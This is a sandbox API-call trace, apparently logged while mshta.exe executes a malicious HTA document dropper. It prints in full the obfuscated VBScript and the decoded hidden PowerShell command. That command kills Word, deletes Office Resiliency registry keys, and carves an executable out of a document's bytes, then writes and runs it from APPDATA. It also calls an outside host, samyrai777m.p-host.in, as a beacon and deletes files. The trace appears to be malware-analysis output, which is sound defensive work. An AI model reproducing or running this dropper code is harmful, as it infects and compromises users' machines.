[0067.164] SysStringLen (param_1="\r\nWindow.ReSizeTo 0, 0\r\nWindow.moveTo -2000,-2000\r\nDim o,kw,cr1,cr2,ps,d,l,r,wv\r\nSet\x09o\x09=\x09CReAtEOBJECt\x09(\x09StrReverse(ChrW(&H57)) & StrReverse(ChrW(&H73)) & StrReverse(Chr(&H43)) & ChrW(&H72) & Chr(&H69) & StrReverse(Chr(&H50)) & StrReverse(Chr(&H74)) & Chr(&H2E) & ChrW(&H53) & StrReverse(Chr(&H48)) & StrReverse(Chr(&H65)) & StrReverse(Chr(&H4C)) & StrReverse(Chr(&H6C))\x09)\r\nwd=o.expAnDenvIRonMEnTStrings(\x09StrReverse(Chr(&H25)) & StrReverse(Chr(&H73)) & StrReverse(ChrW(&H59)) & ChrW(&H53) & StrReverse(Chr(&H74)) & ChrW(&H65) & StrReverse(ChrW(&H6D)) & Chr(&H52) & StrReverse(Chr(&H4F)) & StrReverse(Chr(&H4F)) & StrReverse(Chr(&H74)) & Chr(&H25)\x09)\r\nps= wd & Chr(&H5C) & StrReverse(ChrW(&H53)) & StrReverse(ChrW(&H59)) & ChrW(&H53) & Chr(&H74) & ChrW(&H65) & Chr(&H4D) & StrReverse(ChrW(&H33)) & StrReverse(ChrW(&H32)) & Chr(&H5C) & StrReverse(Chr(&H77)) & ChrW(&H69) & StrReverse(Chr(&H6E)) & ChrW(&H64) & StrReverse(Chr(&H6F)) & Chr(&H77) & Chr(&H73) & StrReverse(ChrW(&H70)) & StrReverse(ChrW(&H4F)) & StrReverse(Chr(&H77)) & Chr(&H65) & StrReverse(Chr(&H52)) & Chr(&H53) & Chr(&H48) & StrReverse(Chr(&H65)) & StrReverse(ChrW(&H4C)) & ChrW(&H4C) & StrReverse(ChrW(&H5C)) & StrReverse(Chr(&H56)) & StrReverse(Chr(&H31)) & ChrW(&H2E) & Chr(&H30) & ChrW(&H5C) & Chr(&H50) & Chr(&H6F) & ChrW(&H57) & Chr(&H45) & ChrW(&H72) & ChrW(&H53) & Chr(&H48) & ChrW(&H45) & Chr(&H4C) & StrReverse(ChrW(&H4C)) & StrReverse(ChrW(&H2E)) & StrReverse(Chr(&H45)) & StrReverse(Chr(&H78)) & Chr(&H65) & \" -WindowStyle Hidden \"\r\nkw = \"taskkill /f /im winword.exe;\"\r\nd=Chr(36)\r\nl=Chr(91)\r\nr=Chr(93)\r\ncr1=\"ri -Path \"\"\"\"\"\"HKCU:\\Software\\Microsoft\\Office\\\"\r\ncr2=\"\\Word\\Resiliency\"\"\"\"\"\" -recurse;\"\r\no.run ps & \"Try{\" & d & \"ada=\"\"\"\"\"\"\" & d & \"env:APPDATA\\result.exe\"\"\"\"\"\";\" & d & \"adax=\" & d & \"ada+'x';\" & d & \"f=\" & l & \"System.IO.File\" & r & \"::Create(\" &d & \"adax);\" & d & \"tmf=\"\"\"\"\"\"\" & d & \"env:TEMP\\o.tmp\"\"\"\"\"\";\" & kw & \"Function pr{Try{\" & d & \"k=\"\"\"\"\"\"HKCU:\\Software\\Microsoft\\Office\\\" &d & \"wv\" & \"\\Word\\Resiliency\\StartupItems\\\"\"\"\"\"\";\" & \"for (\" & d & \"i = 0; \" & d & \"i -lt 10; \" & d & \"i++){\" & d & \"r=\" & l & \"System.Text.Encoding\" & r & \"::Unicode.GetString((gp \" & d & \"k).((gi \" & d & \"k).Property\" & l & d & \"i\" & r & \"));if (\" & d & \"r.Contains('.doc')){\" & d & \"i=10;}}\"\x09& d & \"r=\" & d & \"r.Substring(\" & d & \"r.indexOf(':\\')-1);\" & d & \"r=\" & d & \"r.Substring(0, \" & d & \"r.IndexOf('.doc')+4);\" & cr1 & d & \"wv\" & cr2 & \"cp -Path \"& d &\"r -Destination \" & d & \"tmf\" & \";\" & d & \"d = (gc \" & d & \"tmf\" & \" -ReadCount 0 -encoding byte)\" & l & \"985480..1011591\" & r & \";Start-Sleep -s 1;sc \" & d & \"r -encoding byte -Value \" & d & \"d;\" & \"start winword \"\"\"\"\"\"\" & d & \"r\"\"\"\"\"\";\" & d & \"f = (gc \" & d & \"tmf\" & \" -ReadCount 0 -encoding byte)\" & l & \"420737..985472\" & r & \";sc \" & d & \"ada\" & \" -encoding byte -Value \" & d & \"f;\" & \"& \" & d & \"ada;\" & d & \"wc = New-Object system.Net.WebClient;\" & d & \"ht=\" & d & \"wc.d\" & \"ownl\" & \"oadS\" & \"tri\" & \"ng('http://www.samyrai777m.p-host.in/t/t.php?act=hit');\" & d & \"cd=(Resolve-Path .\\).Path;ri \"\"\"\"\"\"\" & d & \"cd\\*\"\"\"\"\"\" -include http*.pdb, http*.dll, *.cs;\" & \"}Catch{}};\" & d & \"wv='12.0';pr;\" & d & \"wv='14.0';pr;\" & d & \"wv='15.0';pr;\" & d & \"wv='16.0';pr;\" & \"Stop-Process -processname powershell;}Catch{exit;}\",0,true\r\nself.close\r\n") returned 0xccc
[0067.170] ISystemDebugEventFire:IsActive (This=0x362500) returned 0x1
[0067.170] GetCurrentThreadId () returned 0xbcc
[0067.170] GetCurrentThreadId () returned 0xbcc
[0067.171] GetCurrentThreadId () returned 0xbcc
[0067.172] GetCurrentThreadId () returned 0xbcc
[0067.172] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.173] GetCurrentThreadId () returned 0xbcc
[0067.173] GetCurrentThreadId () returned 0xbcc
[0067.173] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.205] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.221] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.222] IsCharSpaceW (wch=0x6f) returned 0
[0067.222] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.222] IsCharSpaceW (wch=0x6f) returned 0
[0067.222] GetCurrentThreadId () returned 0xbcc
[0067.222] GetCurrentThreadId () returned 0xbcc
[0067.222] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.222] GetCurrentThreadId () returned 0xbcc
[0067.222] GetCurrentThreadId () returned 0xbcc
[0067.222] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.222] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.222] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.222] IsCharSpaceW (wch=0x6b) returned 0
[0067.222] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.222] IsCharSpaceW (wch=0x6b) returned 0
[0067.222] GetCurrentThreadId () returned 0xbcc
[0067.222] GetCurrentThreadId () returned 0xbcc
[0067.222] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.222] GetCurrentThreadId () returned 0xbcc
[0067.222] GetCurrentThreadId () returned 0xbcc
[0067.222] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.222] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.222] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.222] IsCharSpaceW (wch=0x63) returned 0
[0067.222] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.222] IsCharSpaceW (wch=0x63) returned 0
[0067.222] GetCurrentThreadId () returned 0xbcc
[0067.222] GetCurrentThreadId () returned 0xbcc
[0067.222] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.222] GetCurrentThreadId () returned 0xbcc
[0067.222] GetCurrentThreadId () returned 0xbcc
[0067.222] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.222] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.222] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.223] IsCharSpaceW (wch=0x63) returned 0
[0067.223] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.223] IsCharSpaceW (wch=0x63) returned 0
[0067.223] GetCurrentThreadId () returned 0xbcc
[0067.223] GetCurrentThreadId () returned 0xbcc
[0067.223] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.223] GetCurrentThreadId () returned 0xbcc
[0067.223] GetCurrentThreadId () returned 0xbcc
[0067.223] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.223] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.223] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.223] IsCharSpaceW (wch=0x70) returned 0
[0067.223] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.223] IsCharSpaceW (wch=0x70) returned 0
[0067.223] GetCurrentThreadId () returned 0xbcc
[0067.223] GetCurrentThreadId () returned 0xbcc
[0067.223] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.223] GetCurrentThreadId () returned 0xbcc
[0067.223] GetCurrentThreadId () returned 0xbcc
[0067.223] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.223] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.223] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.223] IsCharSpaceW (wch=0x64) returned 0
[0067.223] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.223] IsCharSpaceW (wch=0x64) returned 0
[0067.223] GetCurrentThreadId () returned 0xbcc
[0067.223] GetCurrentThreadId () returned 0xbcc
[0067.223] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.223] GetCurrentThreadId () returned 0xbcc
[0067.223] GetCurrentThreadId () returned 0xbcc
[0067.223] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.223] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.223] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.224] IsCharSpaceW (wch=0x6c) returned 0
[0067.224] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.224] IsCharSpaceW (wch=0x6c) returned 0
[0067.224] GetCurrentThreadId () returned 0xbcc
[0067.224] GetCurrentThreadId () returned 0xbcc
[0067.224] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.224] GetCurrentThreadId () returned 0xbcc
[0067.224] GetCurrentThreadId () returned 0xbcc
[0067.224] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.224] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.224] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.224] IsCharSpaceW (wch=0x72) returned 0
[0067.224] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.224] IsCharSpaceW (wch=0x72) returned 0
[0067.224] GetCurrentThreadId () returned 0xbcc
[0067.224] GetCurrentThreadId () returned 0xbcc
[0067.224] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.224] GetCurrentThreadId () returned 0xbcc
[0067.224] GetCurrentThreadId () returned 0xbcc
[0067.224] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.224] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.224] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.224] IsCharSpaceW (wch=0x77) returned 0
[0067.224] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.224] IsCharSpaceW (wch=0x77) returned 0
[0067.224] GetCurrentThreadId () returned 0xbcc
[0067.224] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.224] GetCurrentThreadId () returned 0xbcc
[0067.224] GetCurrentThreadId () returned 0xbcc
[0067.224] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.224] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.224] GetCurrentThreadId () returned 0xbcc
[0067.225] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.230] GetCurrentThreadId () returned 0xbcc
[0067.231] GetCurrentThreadId () returned 0xbcc
[0067.231] IsWindow (hWnd=0x10200) returned 1
[0067.231] IsWindowVisible (hWnd=0x10200) returned 0
[0067.231] GetCurrentThreadId () returned 0xbcc
[0067.231] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.231] GetCurrentThreadId () returned 0xbcc
[0067.231] GetCurrentThreadId () returned 0xbcc
[0067.231] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.231] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.231] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.231] GetCurrentThreadId () returned 0xbcc
[0067.232] GetCurrentThreadId () returned 0xbcc
[0067.232] IsWindow (hWnd=0x10200) returned 1
[0067.232] IsWindowVisible (hWnd=0x10200) returned 0
[0067.234] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefe1c0000
[0067.234] GetProcAddress (hModule=0x7fefe1c0000, lpProcName="CLSIDFromProgIDEx") returned 0x7fefe1da4c4
[0067.234] CLSIDFromProgIDEx (in: lpszProgID="WsCriPt.SHeLl", lpclsid=0x14e620 | out: lpclsid=0x14e620*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
[0067.237] SysStringLen (param_1=0x0) returned 0x0
[0067.237] GetProcAddress (hModule=0x7fefe1c0000, lpProcName="CoGetClassObject") returned 0x7fefe1f2e18
[0067.237] CoGetClassObject (in: rclsid=0x14e620*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fee048e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14e5f0 | out: ppv=0x14e5f0*=0x3e87b0) returned 0x0
[0067.371] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14c8c0 | out: lpSystemTimeAsFileTime=0x14c8c0*(dwLowDateTime=0xd81aba10, dwHighDateTime=0x1d34cee))
[0067.371] GetCurrentProcessId () returned 0xbc8
[0067.371] GetCurrentThreadId () returned 0xbcc
[0067.371] GetTickCount () returned 0x20186
[0067.371] QueryPerformanceCounter (in: lpPerformanceCount=0x14c8c8 | out: lpPerformanceCount=0x14c8c8*=494369615) returned 1
[0067.371] GetVersionExA (in: lpVersionInformation=0x14c6a0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe52b2dc8, dwBuildNumber=0x7fe, dwPlatformId=0xe52a0000, szCSDVersion="þ\x07") | out: lpVersionInformation=0x14c6a0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0067.371] GetUserDefaultLCID () returned 0x409
[0067.371] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14e420, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0067.371] lstrlenA (lpString="\\wscript.exe") returned 12
[0067.371] lstrlenA (lpString="C:\\Windows\\System32\\mshta.exe") returned 29
[0067.371] _strcmpi (_Str1="32\\mshta.exe", _Str2="\\wscript.exe") returned -41
[0067.371] _strcmpi (_Str1="32\\mshta.exe", _Str2="\\cscript.exe") returned -41
[0067.373] LoadRegTypeLib (in: rguid=0x7fee52b2df0*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x14e610*=0x0 | out: pptlib=0x14e610*=0x389910) returned 0x0
[0067.379] ITypeLib:GetTypeInfoOfGuid (in: This=0x389910, GUID=0x7fee52b2c30*(Data1=0x41904400, Data2=0xbe18, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x8b, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x14e658 | out: ppTInfo=0x14e658*=0x3987f8) returned 0x0
[0067.379] ITypeInfo:GetRefTypeOfImplType (in: This=0x3987f8, index=0xffffffff, pRefType=0x14e648 | out: pRefType=0x14e648*=0xfffffffe) returned 0x0
[0067.379] ITypeInfo:GetRefTypeInfo (in: This=0x3987f8, hreftype=0xfffffffe, ppTInfo=0x7fee52bc128 | out: ppTInfo=0x7fee52bc128*=0x398850) returned 0x0
[0067.379] IUnknown:Release (This=0x3987f8) returned 0x1
[0067.379] IUnknown:Release (This=0x389910) returned 0x1
[0067.379] IUnknown:AddRef (This=0x398850) returned 0x2
[0067.379] ITypeInfo:LocalGetIDsOfNames (This=0x398850) returned 0x0
[0067.379] IUnknown:Release (This=0x398850) returned 0x1
[0067.379] IUnknown:AddRef (This=0x398850) returned 0x2
[0067.380] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0067.380] ITypeInfo:LocalInvoke (This=0x398850) returned 0x0
[0067.380] ExpandEnvironmentStringsW (in: lpSrc="%sYStemROOt%", lpDst=0x14cfe0, nSize=0x400 | out: lpDst="C:\\Windows") returned 0xb
[0067.380] IUnknown:Release (This=0x398850) returned 0x1
[0067.380] GetCurrentThreadId () returned 0xbcc
[0067.380] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.380] GetCurrentThreadId () returned 0xbcc
[0067.380] GetCurrentThreadId () returned 0xbcc
[0067.380] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.380] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.380] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.380] IsCharSpaceW (wch=0x77) returned 0
[0067.380] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.380] IsCharSpaceW (wch=0x77) returned 0
[0067.392] IUnknown:AddRef (This=0x398850) returned 0x2
[0067.392] ITypeInfo:LocalGetIDsOfNames (This=0x398850) returned 0x0
[0067.392] IUnknown:Release (This=0x398850) returned 0x1
[0067.392] IUnknown:AddRef (This=0x398850) returned 0x2
[0067.392] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0067.392] ITypeInfo:LocalInvoke (This=0x398850) returned 0x0
[0067.392] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}", lpDst=0x14cf50, nSize=0x400 | out: lpDst="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -i") returned 0x496
[0067.393] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}", lpDst=0x3c6fa8, nSize=0x496 | out: lpDst="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}") returned 0x496
[0067.393] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x7fefe850000
[0067.393] GetProcAddress (hModule=0x7fefe850000, lpProcName="ShellExecuteExW") returned 0x7fefe877c70
[0067.393] ShellExecuteExW (in: pExecInfo=0x14d700*(cbSize=0x70, fMask=0x440, hwnd=0x0, lpVerb="Open", lpFile="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe", lpParameters="-WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14d700*(cbSize=0x70, fMask=0x440, hwnd=0x0, lpVerb="Open", lpFile="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe", lpParameters="-WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, 